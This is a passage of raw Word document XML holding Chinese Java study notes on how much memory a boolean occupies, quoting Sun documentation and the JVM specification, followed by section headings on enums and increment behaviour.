      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：不确定</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D7333" w:rsidRPr="00410475" w:rsidRDefault="00C95D8C" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本来</w:t>
      </w:r>
      <w:r w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应该只占用</w:t>
      </w:r>
      <w:r w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1bit</w:t>
      </w:r>
      <w:r w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1/8</w:t>
      </w:r>
      <w:r w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节的，但实际上，由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>本来</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应该只占用</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1bit</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就是</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1/8</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节的，但实际上，由于</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的实际寻址单元最小是</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>byte</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节，所以所以实际上</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>占用的是可能是</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1bit</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，也可能是更多，这个是不确定的。下面是</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sun</w:t>
      </w:r>
      <w:r w:rsidR="005D7333" w:rsidRPr="00410475">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的官方介绍。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00717679" w:rsidRPr="00F41A4C" w:rsidRDefault="00B80B23" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>boolean: The boolean data type has only two possible values: true and false.Use this data type for simple flags that track true/false conditions. This data type represents one bit of information,</w:t>
      </w:r>
      <w:r w:rsidR="00717679" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>but its “size” isn’t something that’s precisely defined.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00717679" w:rsidRPr="00F41A4C" w:rsidRDefault="00717679" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>再下面是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>jvm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虚拟机规范</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的介绍（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>规范第</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>版</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>节）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941D07" w:rsidRPr="00F41A4C" w:rsidRDefault="00717679" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Where Java programming language boolean values are mapped by compilers to val</w:t>
      </w:r>
      <w:r w:rsidR="00941D07" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ues of Java virtual machine type int, the compilers must use the same encoding.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00375096" w:rsidRPr="00F41A4C" w:rsidRDefault="00941D07" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>所以只是单纯的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>boolean b = true;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>占用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个字节</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00375096" w:rsidRPr="00F41A4C" w:rsidRDefault="00375096" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>而紧接着下面还有一段：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F3E7A" w:rsidRPr="00F41A4C" w:rsidRDefault="00375096" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Arrays of type boolean are accessed and modified using the byte array instructions</w:t>
      </w:r>
      <w:r w:rsidR="002D490B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">In Sun’s JDK releases 1.0 and 1.1, and the Java 2 SDK, Standard Edition, v1.2, boolean </w:t>
      </w:r>
      <w:r w:rsidR="008F3E7A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>arrays in the Java programming language are encoded as Java virtual machine byte arrays, using 8 bits per boolean element.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941D07" w:rsidRPr="00F41A4C" w:rsidRDefault="008F3E7A" w:rsidP="002D490B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所以说</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>boolean[] b = new boolean[10];</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这样的数组中每个值占用的空间是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00941D07" w:rsidRDefault="00887212" w:rsidP="00125738">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参考资料</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="00B42F93" w:rsidRPr="00317088">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>http://irfen.me/java-basic-data-type-space/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008363FB" w:rsidRPr="00B0265B" w:rsidRDefault="008363FB" w:rsidP="008363FB">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">15.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>枚举类型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A23172" w:rsidRPr="00B0265B" w:rsidRDefault="00A23172" w:rsidP="00A23172">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自增问题</w:t>
      </w:r>
      <w:r w:rsidRPr="00B0265B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008363FB" w:rsidRPr="00A23172" w:rsidRDefault="00263DFD" w:rsidP="009D42B5">
      <w:r w:rsidRPr="00263DFD">
